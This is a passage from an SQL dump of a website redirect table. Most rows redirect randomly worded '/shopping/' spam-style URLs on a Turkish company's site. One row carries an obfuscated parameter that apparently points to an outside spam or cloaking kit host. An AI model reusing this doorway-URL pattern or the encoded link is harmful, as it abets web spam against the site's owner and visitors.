00:00:00',301),(67194,'https://3s-technologies.com.tr/tr/shopping/nonadhesive/1115746347.html',NULL,'https://3s-technologies.com.tr/shopping/nonadhesive/1115746347.html','',1,0,'2026-06-10 23:04:14','0000-00-00 00:00:00',301),(67195,'https://3s-technologies.com.tr/tr/shopping/rebarbarization/2047534376.html',NULL,'https://3s-technologies.com.tr/shopping/rebarbarization/2047534376.html','',1,0,'2026-06-10 23:04:19','0000-00-00 00:00:00',301),(67196,'https://3s-technologies.com.tr/tr/shopping/kaabeh/2947010456.html',NULL,'https://3s-technologies.com.tr/shopping/kaabeh/2947010456.html','',1,0,'2026-06-10 23:04:24','0000-00-00 00:00:00',301),(67197,'https://3s-technologies.com.tr/tr/shopping/chauliodus/3387647217.html',NULL,'https://3s-technologies.com.tr/shopping/chauliodus/3387647217.html','',1,0,'2026-06-10 23:04:29','0000-00-00 00:00:00',301),(67198,'https://3s-technologies.com.tr/tr/shopping/iconodule/2314159109.html',NULL,'https://3s-technologies.com.tr/shopping/iconodule/2314159109.html','',1,0,'2026-06-10 23:04:34','0000-00-00 00:00:00',301),(67199,'https://3s-technologies.com.tr/tr/shopping/ruticulla/645953292.html',NULL,'https://3s-technologies.com.tr/shopping/ruticulla/645953292.html','',1,0,'2026-06-10 23:04:39','0000-00-00 00:00:00',301),(67200,'https://3s-technologies.com.tr/tr/shopping/platinic/1346014074.html',NULL,'https://3s-technologies.com.tr/shopping/platinic/1346014074.html','',1,0,'2026-06-10 23:04:44','0000-00-00 00:00:00',301),(67201,'https://3s-technologies.com.tr/tr/shopping/legioned/2477663346.html',NULL,'https://3s-technologies.com.tr/shopping/legioned/2477663346.html','',1,0,'2026-06-10 23:04:49','0000-00-00 00:00:00',301),(67202,'https://3s-technologies.com.tr/tr/shopping/usbegs/179884586.html',NULL,'https://3s-technologies.com.tr/shopping/usbegs/179884586.html','',1,0,'2026-06-10 23:04:54','0000-00-00 00:00:00',301),(67203,'https://3s-technologies.com.tr/tr/shopping/simplician/4214632985.html',NULL,'https://3s-technologies.com.tr/shopping/simplician/4214632985.html','',1,0,'2026-06-10 23:04:59','0000-00-00 00:00:00',301),(67204,'https://3s-technologies.com.tr/tr/shopping/armozine/2654228529.html',NULL,'https://3s-technologies.com.tr/shopping/armozine/2654228529.html','',1,0,'2026-06-10 23:05:07','0000-00-00 00:00:00',301),(67205,'https://3s-technologies.com.tr/tr/shopping/sarceled/842415842.html',NULL,'https://3s-technologies.com.tr/shopping/sarceled/842415842.html','',1,0,'2026-06-10 23:05:11','0000-00-00 00:00:00',301),(67206,'https://3s-technologies.com.tr/tr/shopping/artifactual/4062289547.html',NULL,'https://3s-technologies.com.tr/shopping/artifactual/4062289547.html','',1,0,'2026-06-10 23:05:16','0000-00-00 00:00:00',301),(67207,'https://3s-technologies.com.tr/tr/shopping/seise/4280971177.html',NULL,'https://3s-technologies.com.tr/shopping/seise/4280971177.html','',1,0,'2026-06-10 23:05:21','0000-00-00 00:00:00',301),(67208,'https://3s-technologies.com.tr/tr/shopping/surrebound/2526598441.html',NULL,'https://3s-technologies.com.tr/shopping/surrebound/2526598441.html','',1,0,'2026-06-10 23:05:26','0000-00-00 00:00:00',301),(67209,'https://3s-technologies.com.tr/tr/shopping/commensurating/2400180468.html',NULL,'https://3s-technologies.com.tr/shopping/commensurating/2400180468.html','',1,0,'2026-06-10 23:05:31','0000-00-00 00:00:00',301),(67210,'https://3s-technologies.com.tr/tr/shopping/joyousness/1567417249.html',NULL,'https://3s-technologies.com.tr/shopping/joyousness/1567417249.html','',1,0,'2026-06-10 23:05:36','0000-00-00 00:00:00',301),(67211,'https://3s-technologies.com.tr/tr/shopping/cobaltic/1152829960.html',NULL,'https://3s-technologies.com.tr/shopping/cobaltic/1152829960.html','',1,0,'2026-06-10 23:05:41','0000-00-00 00:00:00',301),(67212,'https://3s-technologies.com.tr/tr/shopping/sagebrush/1268089785.html',NULL,'https://3s-technologies.com.tr/shopping/sagebrush/1268089785.html','',1,0,'2026-06-10 23:05:50','0000-00-00 00:00:00',301),(67213,'https://3s-technologies.com.tr/tr/shopping/tithes/3167022332.html',NULL,'https://3s-technologies.com.tr/shopping/tithes/3167022332.html','',1,0,'2026-06-10 23:05:55','0000-00-00 00:00:00',301),(67214,'https://3s-technologies.com.tr/tr/shopping/witenagemote/2453343348.html',NULL,'https://3s-technologies.com.tr/shopping/witenagemote/2453343348.html','',1,0,'2026-06-10 23:06:00','0000-00-00 00:00:00',301),(67215,'https://3s-technologies.com.tr/tr/shopping/priestery/3894851714.html',NULL,'https://3s-technologies.com.tr/shopping/priestery/3894851714.html','',1,0,'2026-06-10 23:06:05','0000-00-00 00:00:00',301),(67216,'https://3s-technologies.com.tr/tr/shopping/gossip/1582511628.html',NULL,'https://3s-technologies.com.tr/shopping/gossip/1582511628.html','',1,0,'2026-06-10 23:06:10','0000-00-00 00:00:00',301),(67217,'https://3s-technologies.com.tr/tr/shopping/pentandrian/711409065.html',NULL,'https://3s-technologies.com.tr/shopping/pentandrian/711409065.html','',1,0,'2026-06-10 23:06:15','0000-00-00 00:00:00',301),(67218,'https://3s-technologies.com.tr/tr/shopping/haemapod/3409099406.html',NULL,'https://3s-technologies.com.tr/shopping/haemapod/3409099406.html','',1,0,'2026-06-10 23:06:20','0000-00-00 00:00:00',301),(67219,'https://3s-technologies.com.tr/tr/shopping/thunnus/1713215198.html',NULL,'https://3s-technologies.com.tr/shopping/thunnus/1713215198.html','',1,0,'2026-06-10 23:06:25','0000-00-00 00:00:00',301),(67220,'https://3s-technologies.com.tr/tr/shopping/anamorphosis/1491737942.html',NULL,'https://3s-technologies.com.tr/shopping/anamorphosis/1491737942.html','',1,0,'2026-06-10 23:06:30','0000-00-00 00:00:00',301),(67221,'https://3s-technologies.com.tr/tr/shopping/cnidaria/2239823059.html',NULL,'https://3s-technologies.com.tr/shopping/cnidaria/2239823059.html','',1,0,'2026-06-10 23:06:35','0000-00-00 00:00:00',301),(67222,'https://3s-technologies.com.tr/tr/shopping/filthiest/2834900109.html',NULL,'https://3s-technologies.com.tr/shopping/filthiest/2834900109.html','',1,0,'2026-06-10 23:06:40','0000-00-00 00:00:00',301),(67223,'https://3s-technologies.com.tr/tr/shopping/uncouthness/3502693293.html',NULL,'https://3s-technologies.com.tr/shopping/uncouthness/3502693293.html','',1,0,'2026-06-10 23:06:45','0000-00-00 00:00:00',301),(67224,'https://3s-technologies.com.tr/tr/shopping/reglementary/769569779.html',NULL,'https://3s-technologies.com.tr/shopping/reglementary/769569779.html','',1,0,'2026-06-10 23:06:50','0000-00-00 00:00:00',301),(67225,'https://3s-technologies.com.tr/tr/shopping/airdrawn/2748453420.html',NULL,'https://3s-technologies.com.tr/shopping/airdrawn/2748453420.html','',1,0,'2026-06-10 23:06:58','0000-00-00 00:00:00',301),(67226,'https://3s-technologies.com.tr/tr/shopping/arctotis/3255380314.html',NULL,'https://3s-technologies.com.tr/shopping/arctotis/3255380314.html','',1,0,'2026-06-10 23:07:02','0000-00-00 00:00:00',301),(67227,'https://3s-technologies.com.tr/tr/shopping/innovator/3779939414.html',NULL,'https://3s-technologies.com.tr/shopping/innovator/3779939414.html','',1,0,'2026-06-10 23:07:07','0000-00-00 00:00:00',301),(67228,'https://3s-technologies.com.tr/tr/shopping/cockweed/83537256.html',NULL,'https://3s-technologies.com.tr/shopping/cockweed/83537256.html','',1,0,'2026-06-10 23:07:12','0000-00-00 00:00:00',301),(67229,'https://3s-technologies.com.tr/tr/shopping/nematocidal/3032245046.html',NULL,'https://3s-technologies.com.tr/shopping/nematocidal/3032245046.html','',1,0,'2026-06-10 23:07:17','0000-00-00 00:00:00',301),(67230,'https://3s-technologies.com.tr/tr/shopping/hustings/3238680436.html',NULL,'https://3s-technologies.com.tr/shopping/hustings/3238680436.html','',1,0,'2026-06-10 23:07:22','0000-00-00 00:00:00',301),(67231,'https://3s-technologies.com.tr/tr/shopping/sulphion/384853312.html',NULL,'https://3s-technologies.com.tr/shopping/sulphion/384853312.html','',1,0,'2026-06-10 23:07:28','0000-00-00 00:00:00',301),(67232,'https://3s-technologies.com.tr/tr/shopping/cressy/3271734819.html',NULL,'https://3s-technologies.com.tr/shopping/cressy/3271734819.html','',1,0,'2026-06-10 23:07:33','0000-00-00 00:00:00',301),(67233,'https://3s-technologies.com.tr/tr/shopping/couped/1805632102.html',NULL,'https://3s-technologies.com.tr/shopping/couped/1805632102.html','',1,0,'2026-06-10 23:07:38','0000-00-00 00:00:00',301),(67234,'https://3s-technologies.com.tr/tr/shopping/stonish/3642663211.html',NULL,'https://3s-technologies.com.tr/shopping/stonish/3642663211.html','',1,0,'2026-06-10 23:07:43','0000-00-00 00:00:00',301),(67235,'https://3s-technologies.com.tr/tr/shopping/glasynge/1244932770.html',NULL,'https://3s-technologies.com.tr/shopping/glasynge/1244932770.html','',1,0,'2026-06-10 23:07:48','0000-00-00 00:00:00',301),(67236,'https://3s-technologies.com.tr/tr/shopping/mealies/2264698874.html',NULL,'https://3s-technologies.com.tr/shopping/mealies/2264698874.html','',1,0,'2026-06-10 23:07:53','0000-00-00 00:00:00',301),(67237,'https://3s-technologies.com.tr/tr/shopping/parietus/1598264385.html',NULL,'https://3s-technologies.com.tr/shopping/parietus/1598264385.html','',1,0,'2026-06-10 23:07:58','0000-00-00 00:00:00',301),(67238,'https://3s-technologies.com.tr/tr/shopping/pheasants/2778577475.html',NULL,'https://3s-technologies.com.tr/shopping/pheasants/2778577475.html','',1,0,'2026-06-10 23:08:03','0000-00-00 00:00:00',301),(67239,'https://3s-technologies.com.tr/tr/shopping/ophiomancy/2079587806.html',NULL,'https://3s-technologies.com.tr/shopping/ophiomancy/2079587806.html','',1,0,'2026-06-10 23:08:10','0000-00-00 00:00:00',301),(67240,'https://3s-technologies.com.tr/tr/shopping/assuetude/2531350768.html',NULL,'https://3s-technologies.com.tr/shopping/assuetude/2531350768.html','',1,0,'2026-06-10 23:08:14','0000-00-00 00:00:00',301),(67241,'https://3s-technologies.com.tr/tr/shopping/pestilentially/2677336412.html',NULL,'https://3s-technologies.com.tr/shopping/pestilentially/2677336412.html','',1,0,'2026-06-10 23:08:19','0000-00-00 00:00:00',301),(67242,'https://3s-technologies.com.tr/tr/shopping/retractation/2081800407.html',NULL,'https://3s-technologies.com.tr/shopping/retractation/2081800407.html','',1,0,'2026-06-10 23:08:24','0000-00-00 00:00:00',301),(67243,'https://3s-technologies.com.tr/tr/shopping/eyedeceiving/3049552042.html',NULL,'https://3s-technologies.com.tr/shopping/eyedeceiving/3049552042.html','',1,0,'2026-06-10 23:08:29','0000-00-00 00:00:00',301),(67244,'https://3s-technologies.com.tr/tr/shopping/majors/2175745542.html',NULL,'https://3s-technologies.com.tr/shopping/majors/2175745542.html','',1,0,'2026-06-10 23:08:34','0000-00-00 00:00:00',301),(67245,'https://3s-technologies.com.tr/tr/shopping/blackwash/714392370.html',NULL,'https://3s-technologies.com.tr/shopping/blackwash/714392370.html','',1,0,'2026-06-10 23:08:39','0000-00-00 00:00:00',301),(67246,'https://3s-technologies.com.tr/tr/shopping/housemaid/3601298632.html',NULL,'https://3s-technologies.com.tr/shopping/housemaid/3601298632.html','',1,0,'2026-06-10 23:08:44','0000-00-00 00:00:00',301),(67247,'https://3s-technologies.com.tr/tr/shopping/disreputably/3071659423.html',NULL,'https://3s-technologies.com.tr/shopping/disreputably/3071659423.html','',1,0,'2026-06-10 23:08:49','0000-00-00 00:00:00',301),(67248,'https://3s-technologies.com.tr/tr/shopping/uncoil/3579584683.html',NULL,'https://3s-technologies.com.tr/shopping/uncoil/3579584683.html','',1,0,'2026-06-10 23:08:54','0000-00-00 00:00:00',301),(67249,'https://3s-technologies.com.tr/tr/shopping/sourkrout/1320267809.html',NULL,'https://3s-technologies.com.tr/shopping/sourkrout/1320267809.html','',1,0,'2026-06-10 23:09:00','0000-00-00 00:00:00',301),(67250,'https://3s-technologies.com.tr/tr/shopping/kirked/1735927497.html',NULL,'https://3s-technologies.com.tr/shopping/kirked/1735927497.html','',1,0,'2026-06-10 23:09:02','0000-00-00 00:00:00',301),(67251,'https://3s-technologies.com.tr/tr/shopping/unsophisticatedness/153188449.html',NULL,'https://3s-technologies.com.tr/shopping/unsophisticatedness/153188449.html','',1,0,'2026-06-10 23:09:05','0000-00-00 00:00:00',301),(67252,'https://3s-technologies.com.tr/tr/shopping/hornsman/3404347079.html',NULL,'https://3s-technologies.com.tr/shopping/hornsman/3404347079.html','',1,0,'2026-06-10 23:09:08','0000-00-00 00:00:00',301),(67253,'https://3s-technologies.com.tr/tr/shopping/pricasour/3850883858.html',NULL,'https://3s-technologies.com.tr/shopping/pricasour/3850883858.html','',1,0,'2026-06-10 23:09:11','0000-00-00 00:00:00',301),(67254,'https://3s-technologies.com.tr/tr/shopping/prelature/573814197.html',NULL,'https://3s-technologies.com.tr/shopping/prelature/573814197.html','',1,0,'2026-06-10 23:09:18','0000-00-00 00:00:00',301),(67255,'https://3s-technologies.com.tr/tr/shopping/atherinidae/2003905065.html',NULL,'https://3s-technologies.com.tr/shopping/atherinidae/2003905065.html','',1,0,'2026-06-10 23:09:22','0000-00-00 00:00:00',301),(67256,'https://3s-technologies.com.tr/tr/shopping/tsetung/4015908992.html',NULL,'https://3s-technologies.com.tr/shopping/tsetung/4015908992.html','',1,0,'2026-06-10 23:09:25','0000-00-00 00:00:00',301),(67257,'https://3s-technologies.com.tr/tr/shopping/eumycetes/3990262183.html',NULL,'https://3s-technologies.com.tr/shopping/eumycetes/3990262183.html','',1,0,'2026-06-10 23:09:28','0000-00-00 00:00:00',301),(67258,'https://3s-technologies.com.tr/tr/shopping/roominess/3850799256.html',NULL,'https://3s-technologies.com.tr/shopping/roominess/3850799256.html','',1,0,'2026-06-10 23:09:31','0000-00-00 00:00:00',301),(67259,'https://3s-technologies.com.tr/tr/shopping/cerebrate/3771417014.html',NULL,'https://3s-technologies.com.tr/shopping/cerebrate/3771417014.html','',1,0,'2026-06-10 23:09:34','0000-00-00 00:00:00',301),(67260,'https://3s-technologies.com.tr/tr/shopping/mesothoracic/2948781662.html',NULL,'https://3s-technologies.com.tr/shopping/mesothoracic/2948781662.html','',1,0,'2026-06-10 23:09:37','0000-00-00 00:00:00',301),(67261,'https://3s-technologies.com.tr/tr/shopping/bouleversement/3135768521.html',NULL,'https://3s-technologies.com.tr/shopping/bouleversement/3135768521.html','',1,0,'2026-06-10 23:09:40','0000-00-00 00:00:00',301),(67262,'https://3s-technologies.com.tr/tr/shopping/teutones/3256592429.html',NULL,'https://3s-technologies.com.tr/shopping/teutones/3256592429.html','',1,0,'2026-06-10 23:09:43','0000-00-00 00:00:00',301),(67263,'https://3s-technologies.com.tr/tr/shopping/maleate/1301408988.html',NULL,'https://3s-technologies.com.tr/shopping/maleate/1301408988.html','',1,0,'2026-06-10 23:09:50','0000-00-00 00:00:00',301),(67264,'https://3s-technologies.com.tr/tr/shopping/humoralism/2265178968.html',NULL,'https://3s-technologies.com.tr/shopping/humoralism/2265178968.html','',1,0,'2026-06-10 23:09:53','0000-00-00 00:00:00',301),(67265,'https://3s-technologies.com.tr/tr/shopping/histiopterus/988666725.html',NULL,'https://3s-technologies.com.tr/shopping/histiopterus/988666725.html','',1,0,'2026-06-10 23:09:56','0000-00-00 00:00:00',301),(67266,'https://3s-technologies.com.tr/tr/shopping/antistrophon/678226537.html',NULL,'https://3s-technologies.com.tr/shopping/antistrophon/678226537.html','',1,0,'2026-06-10 23:09:59','0000-00-00 00:00:00',301),(67267,'https://3s-technologies.com.tr/tr/shopping/corymbiferous/3005586470.html',NULL,'https://3s-technologies.com.tr/shopping/corymbiferous/3005586470.html','',1,0,'2026-06-10 23:10:02','0000-00-00 00:00:00',301),(67268,'https://3s-technologies.com.tr/tr/shopping/watercolorist/3528049202.html',NULL,'https://3s-technologies.com.tr/shopping/watercolorist/3528049202.html','',1,0,'2026-06-10 23:10:05','0000-00-00 00:00:00',301),(67269,'https://3s-technologies.com.tr/tr/shopping/himantoglossum/1895273907.html',NULL,'https://3s-technologies.com.tr/shopping/himantoglossum/1895273907.html','',1,0,'2026-06-10 23:10:08','0000-00-00 00:00:00',301),(67270,'https://3s-technologies.com.tr/tr/shopping/withing/4192440612.html',NULL,'https://3s-technologies.com.tr/shopping/withing/4192440612.html','',1,0,'2026-06-10 23:10:17','0000-00-00 00:00:00',301),(67271,'https://3s-technologies.com.tr/tr/shopping/kiddow/360855153.html',NULL,'https://3s-technologies.com.tr/shopping/kiddow/360855153.html','',1,0,'2026-06-10 23:10:19','0000-00-00 00:00:00',301),(67272,'https://3s-technologies.com.tr/tr/shopping/piteous/884020335.html',NULL,'https://3s-technologies.com.tr/shopping/piteous/884020335.html','',1,0,'2026-06-10 23:10:22','0000-00-00 00:00:00',301),(67273,'https://3s-technologies.com.tr/tr/shopping/apodictically/287323352.html',NULL,'https://3s-technologies.com.tr/shopping/apodictically/287323352.html','',1,0,'2026-06-10 23:10:25','0000-00-00 00:00:00',301),(67274,'https://3s-technologies.com.tr/tr/shopping/slapping/278145792.html',NULL,'https://3s-technologies.com.tr/shopping/slapping/278145792.html','',1,0,'2026-06-10 23:10:28','0000-00-00 00:00:00',301),(67275,'https://3s-technologies.com.tr/tr/shopping/distorting/1717882485.html',NULL,'https://3s-technologies.com.tr/shopping/distorting/1717882485.html','',1,0,'2026-06-10 23:10:31','0000-00-00 00:00:00',301),(67276,'https://3s-technologies.com.tr/tr/shopping/acceptilation/1653822052.html',NULL,'https://3s-technologies.com.tr/shopping/acceptilation/1653822052.html','',1,0,'2026-06-10 23:10:34','0000-00-00 00:00:00',301),(67277,'https://3s-technologies.com.tr/tr/shopping/cracking/3376073184.html',NULL,'https://3s-technologies.com.tr/shopping/cracking/3376073184.html','',1,0,'2026-06-10 23:10:37','0000-00-00 00:00:00',301),(67278,'https://3s-technologies.com.tr/tr/shopping/allowably/1601221971.html',NULL,'https://3s-technologies.com.tr/shopping/allowably/1601221971.html','',1,0,'2026-06-10 23:10:40','0000-00-00 00:00:00',301),(67279,'https://3s-technologies.com.tr/tr/shopping/stulp/1126214521.html',NULL,'https://3s-technologies.com.tr/shopping/stulp/1126214521.html','',1,0,'2026-06-10 23:10:43','0000-00-00 00:00:00',301),(67280,'https://3s-technologies.com.tr/tr/shopping/edify/1350815185.html',NULL,'https://3s-technologies.com.tr/shopping/edify/1350815185.html','',1,0,'2026-06-10 23:10:46','0000-00-00 00:00:00',301),(67281,'https://3s-technologies.com.tr/tr/shopping/selfinterested/3229530601.html',NULL,'https://3s-technologies.com.tr/shopping/selfinterested/3229530601.html','',1,0,'2026-06-10 23:10:49','0000-00-00 00:00:00',301),(67282,'https://3s-technologies.com.tr/tr/shopping/rootery/2997500623.html',NULL,'https://3s-technologies.com.tr/shopping/rootery/2997500623.html','',1,0,'2026-06-10 23:10:52','0000-00-00 00:00:00',301),(67283,'https://3s-technologies.com.tr/tr/shopping/slighting/352332333.html',NULL,'https://3s-technologies.com.tr/shopping/slighting/352332333.html','',1,0,'2026-06-10 23:10:55','0000-00-00 00:00:00',301),(67284,'https://3s-technologies.com.tr/tr/shopping/highresolution/1407090184.html',NULL,'https://3s-technologies.com.tr/shopping/highresolution/1407090184.html','',1,0,'2026-06-10 23:10:58','0000-00-00 00:00:00',301),(67285,'https://3s-technologies.com.tr/tr/shopping/asphyxia/1962867335.html',NULL,'https://3s-technologies.com.tr/shopping/asphyxia/1962867335.html','',1,0,'2026-06-10 23:11:01','0000-00-00 00:00:00',301),(67286,'https://3s-technologies.com.tr/tr/shopping/rennin/713488647.html',NULL,'https://3s-technologies.com.tr/shopping/rennin/713488647.html','',1,0,'2026-06-10 23:11:04','0000-00-00 00:00:00',301),(67287,'https://3s-technologies.com.tr/tr/shopping/inscrutable/2604389711.html',NULL,'https://3s-technologies.com.tr/shopping/inscrutable/2604389711.html','',1,0,'2026-06-10 23:11:07','0000-00-00 00:00:00',301),(67288,'https://3s-technologies.com.tr/tr/shopping/infesting/1050082546.html',NULL,'https://3s-technologies.com.tr/shopping/infesting/1050082546.html','',1,0,'2026-06-10 23:11:10','0000-00-00 00:00:00',301),(67289,'https://3s-technologies.com.tr/tr/shopping/rapacious/1965031925.html',NULL,'https://3s-technologies.com.tr/shopping/rapacious/1965031925.html','',1,0,'2026-06-10 23:11:14','0000-00-00 00:00:00',301),(67290,'https://3s-technologies.com.tr/tr/shopping/interpellant/3311291430.html',NULL,'https://3s-technologies.com.tr/shopping/interpellant/3311291430.html','',1,0,'2026-06-10 23:11:16','0000-00-00 00:00:00',301),(67291,'https://3s-technologies.com.tr/tr/shopping/cotyledonal/3634827129.html',NULL,'https://3s-technologies.com.tr/shopping/cotyledonal/3634827129.html','',1,0,'2026-06-10 23:11:19','0000-00-00 00:00:00',301),(67292,'https://3s-technologies.com.tr/tr/shopping/heedless/3193633461.html',NULL,'https://3s-technologies.com.tr/shopping/heedless/3193633461.html','',1,0,'2026-06-10 23:11:22','0000-00-00 00:00:00',301),(67293,'https://3s-technologies.com.tr/tr/shopping/countersecure/3483481574.html',NULL,'https://3s-technologies.com.tr/shopping/countersecure/3483481574.html','',1,0,'2026-06-10 23:11:25','0000-00-00 00:00:00',301),(67294,'https://3s-technologies.com.tr/tr/shopping/clipperbuilt/3871840191.html',NULL,'https://3s-technologies.com.tr/shopping/clipperbuilt/3871840191.html','',1,0,'2026-06-10 23:11:28','0000-00-00 00:00:00',301),(67295,'https://3s-technologies.com.tr/tr/shopping/factorise/672468787.html',NULL,'https://3s-technologies.com.tr/shopping/factorise/672468787.html','',1,0,'2026-06-10 23:11:31','0000-00-00 00:00:00',301),(67296,'https://3s-technologies.com.tr/tr/shopping/provisioning/915585911.html',NULL,'https://3s-technologies.com.tr/shopping/provisioning/915585911.html','',1,0,'2026-06-10 23:11:34','0000-00-00 00:00:00',301),(67297,'https://3s-technologies.com.tr/tr/shopping/workways/3146207764.html',NULL,'https://3s-technologies.com.tr/shopping/workways/3146207764.html','',1,0,'2026-06-10 23:11:37','0000-00-00 00:00:00',301),(67298,'https://3s-technologies.com.tr/tr/shopping/negress/1199565699.html',NULL,'https://3s-technologies.com.tr/shopping/negress/1199565699.html','',1,0,'2026-06-10 23:11:40','0000-00-00 00:00:00',301),(67299,'https://3s-technologies.com.tr/tr/shopping/restored/584529348.html',NULL,'https://3s-technologies.com.tr/shopping/restored/584529348.html','',1,0,'2026-06-10 23:11:43','0000-00-00 00:00:00',301),(67300,'https://3s-technologies.com.tr/tr/shopping/watchtower/567010771.html',NULL,'https://3s-technologies.com.tr/shopping/watchtower/567010771.html','',1,0,'2026-06-10 23:11:46','0000-00-00 00:00:00',301),(67301,'https://3s-technologies.com.tr/tr/shopping/immunities/3939163239.html',NULL,'https://3s-technologies.com.tr/shopping/immunities/3939163239.html','',1,0,'2026-06-10 23:11:49','0000-00-00 00:00:00',301),(67302,'https://3s-technologies.com.tr/tr/shopping/humanistic/3442298207.html',NULL,'https://3s-technologies.com.tr/shopping/humanistic/3442298207.html','',1,0,'2026-06-10 23:11:52','0000-00-00 00:00:00',301),(67303,'https://3s-technologies.com.tr/tr/shopping/thirdpenny/1867914926.html',NULL,'https://3s-technologies.com.tr/shopping/thirdpenny/1867914926.html','',1,0,'2026-06-10 23:11:55','0000-00-00 00:00:00',301),(67304,'https://3s-technologies.com.tr/tr/shopping/desinential/7232698.html',NULL,'https://3s-technologies.com.tr/shopping/desinential/7232698.html','',1,0,'2026-06-10 23:11:58','0000-00-00 00:00:00',301),(67305,'https://3s-technologies.com.tr/tr/shopping/pustulate/932333816.html',NULL,'https://3s-technologies.com.tr/shopping/pustulate/932333816.html','',1,0,'2026-06-10 23:12:01','0000-00-00 00:00:00',301),(67306,'https://3s-technologies.com.tr/tr/shopping/selectman/1846414694.html',NULL,'https://3s-technologies.com.tr/shopping/selectman/1846414694.html','',1,0,'2026-06-10 23:12:04','0000-00-00 00:00:00',301),(67307,'https://3s-technologies.com.tr/tr/shopping/composed/3813580629.html',NULL,'https://3s-technologies.com.tr/shopping/composed/3813580629.html','',1,0,'2026-06-10 23:12:07','0000-00-00 00:00:00',301),(67308,'https://3s-technologies.com.tr/tr/shopping/festooning/173835184.html',NULL,'https://3s-technologies.com.tr/shopping/festooning/173835184.html','',1,0,'2026-06-10 23:12:10','0000-00-00 00:00:00',301),(67309,'https://3s-technologies.com.tr/tr/shopping/uncharitable/4000682346.html',NULL,'https://3s-technologies.com.tr/shopping/uncharitable/4000682346.html','',1,0,'2026-06-10 23:12:13','0000-00-00 00:00:00',301),(67310,'https://3s-technologies.com.tr/tr/shopping/rapturing/2671563266.html',NULL,'https://3s-technologies.com.tr/shopping/rapturing/2671563266.html','',1,0,'2026-06-10 23:12:16','0000-00-00 00:00:00',301),(67311,'https://3s-technologies.com.tr/tr/shopping/swerving/389975504.html',NULL,'https://3s-technologies.com.tr/shopping/swerving/389975504.html','',1,0,'2026-06-10 23:12:19','0000-00-00 00:00:00',301),(67312,'https://3s-technologies.com.tr/tr/shopping/incomer/882644697.html',NULL,'https://3s-technologies.com.tr/shopping/incomer/882644697.html','',1,0,'2026-06-10 23:12:22','0000-00-00 00:00:00',301),(67313,'https://3s-technologies.com.tr/tr/934390-juejiang?array=7o2230223n313738313133373234382p2231223n22687474703n5p2s5p2s7n7337363076313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313738313133333634382q3962626530666565313535343631623966313930333664613230633430333264222p2232223n226138396461653834356330303433353232653737306138636639663931383838222p2233223n223032623832383666613964616438643064623861303630393930663139393437222p2262696r675s70617373223n2232382q33392q35312q36352q37322q38342q3838227q',NULL,'https://3s-technologies.com.tr/934390-juejiang/?ARRAY=7o2230223n313738313133373234382p2231223n22687474703n5p2s5p2s7n7337363076313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313738313133333634382q3962626530666565313535343631623966313930333664613230633430333264222p2232223n226138396461653834356330303433353232653737306138636639663931383838222p2233223n223032623832383666613964616438643064623861303630393930663139393437222p2262696r675s70617373223n2232382q33392q35312q36352q37322q38342q3838227q','',1,0,'2026-06-10 23:12:24','0000-00-00 00:00:00',301),(67314,'https://3s-technologies.com.tr/tr/shopping/semidouble/3338151122.html',NULL,'https://3s-technologies.com.tr/shopping/semidouble/3338151122.html','',1,0,'2026-06-10 23:12:25','0000-00-00 00:00:00',301),(67315,'https://3s-technologies.com.tr/tr/shopping/pectiniform/254266786.html',NULL,'https://3s-technologies.com.tr/shopping/pectiniform/254266786.html','',1,0,'2026-06-10 23:12:28','0000-00-00 00:00:00',301),(67316,'https://3s-technologies.com.tr/tr/shopping/mussed/1936336904.html',NULL,'https://3s-technologies.com.tr/shopping/mussed/1936336904.html','',1,0,'2026-06-10 23:12:31','0000-00-00 00:00:00',301),(67317,'https://3s-technologies.com.tr/tr/shopping/draggled/2598048549.html',NULL,'https://3s-technologies.com.tr/shopping/draggled/2598048549.html','',1,0,'2026-06-10 23:12:34','0000-00-00 00:00:00',301),(67318,'https://3s-technologies.com.tr/tr/shopping/daubery/894690645.html',NULL,'https://3s-technologies.com.tr/shopping/daubery/894690645.html','',1,0,'2026-06-10 23:12:37','0000-00-00 00:00:00',301),(67319,'https://3s-technologies.com.tr/tr/shopping/complanar/2940584318.html',NULL,'https://3s-technologies.com.tr/shopping/complanar/2940584318.html','',1,0,'2026-06-10 23:12:40','0000-00-00 00:00:00',301),(67320,'https://3s-technologies.com.tr/tr/shopping/resigning/4191228529.html',NULL,'https://3s-technologies.com.tr/shopping/resigning/4191228529.html','',1,0,'2026-06-10 23:12:43','0000-00-00 00:00:00',301),(67321,'https://3s-technologies.com.tr/tr/shopping/jogging/1985927191.html',NULL,'https://3s-technologies.com.tr/shopping/jogging/1985927191.html','',1,0,'2026-06-10 23:12:46','0000-00-00 00:00:00',301),(67322,'https://3s-technologies.com.tr/tr/shopping/herborization/2788387287.html',NULL,'https://3s-technologies.com.tr/shopping/herborization/2788387287.html','',1,0,'2026-06-10 23:12:49','0000-00-00 00:00:00',301),(67323,'https://3s-technologies.com.tr/tr/shopping/dripstone/628906614.html',NULL,'https://3s-technologies.com.tr/shopping/dripstone/628906614.html','',1,0,'2026-06-10 23:12:52','0000-00-00 00:00:00',301),(67324,'https://3s-technologies.com.tr/tr/shopping/blasted/2330003843.html',NULL,'https://3s-technologies.com.tr/shopping/blasted/2330003843.html','',1,0,'2026-06-10 23:12:55','0000-00-00 00:00:00',301),(67325,'https://3s-technologies.com.tr/tr/shopping/rejoining/754112488.html',NULL,'https://3s-technologies.com.tr/shopping/rejoining/754112488.html','',1,0,'2026-06-10 23:12:58','0000-00-00 00:00:00',301),(67326,'https://3s-technologies.com.tr/tr/shopping/ormazd/664960950.html',NULL,'https://3s-technologies.com.tr/shopping/ormazd/664960950.html','',1,0,'2026-06-10 23:13:01','0000-00-00 00:00:00',301),(67327,'https://3s-technologies.com.tr/tr/shopping/surmisable/3643069314.html',NULL,'https://3s-technologies.com.tr/shopping/surmisable/3643069314.html','',1,0,'2026-06-10 23:13:04','0000-00-00 00:00:00',301),(67328,'https://3s-technologies.com.tr/tr/shopping/endogenesis/1689693598.html',NULL,'https://3s-technologies.com.tr/shopping/endogenesis/1689693598.html','',1,0,'2026-06-10 23:13:10','0000-00-00 00:00:00',301),(67329,'https://3s-technologies.com.tr/tr/shopping/peripneumonic/892362532.html',NULL,'https://3s-technologies.com.tr/shopping/peripneumonic/892362532.html','',1,0,'2026-06-10 23:13:14','0000-00-00 00:00:00',301),(67330,'https://3s-technologies.com.tr/tr/shopping/sheepcot/1866702827.html',NULL,'https://3s-technologies.com.tr/shopping/sheepcot/1866702827.html','',1,0,'2026-06-10 23:13:17','0000-00-00 